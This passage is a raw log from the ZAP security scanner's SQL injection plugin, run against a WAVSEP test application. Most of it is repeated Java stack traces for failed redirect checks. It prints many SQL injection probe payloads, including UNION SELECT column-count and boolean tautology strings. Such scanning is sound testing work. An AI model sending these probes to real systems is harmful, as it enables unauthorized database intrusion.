org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680111 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680111 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9680194 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 1568=5371 AND (5513=5513] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 1568=5371 AND (5513=5513 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680195 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 3022=3022 AND (6599=6599] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 3022=3022 AND (6599=6599 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680197 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 1568=5371 AND (5513=5513] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 1568=5371 AND (5513=5513 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680198 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 6700=4622] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 6700=4622 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680200 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 2762=2762] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 2762=2762 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680201 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 6700=4622] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 6700=4622 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680203 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 6835=9309 AND ('aTUj'='aTUj] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 6835=9309 AND ('aTUj'='aTUj at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680204 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 2324=2324 AND ('Ohrh'='Ohrh] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 2324=2324 AND ('Ohrh'='Ohrh at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680205 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 6835=9309 AND ('aTUj'='aTUj] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 6835=9309 AND ('aTUj'='aTUj at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680207 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 8290=5936 AND 'IFpM'='IFpM] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 8290=5936 AND 'IFpM'='IFpM at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680209 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 7559=7559 AND 'OkmG'='OkmG] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 7559=7559 AND 'OkmG'='OkmG at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680210 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 8290=5936 AND 'IFpM'='IFpM] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 8290=5936 AND 'IFpM'='IFpM at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680212 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 9311=3605 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 9311=3605 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680213 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 7429=7429 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 7429=7429 AND '%'=' at 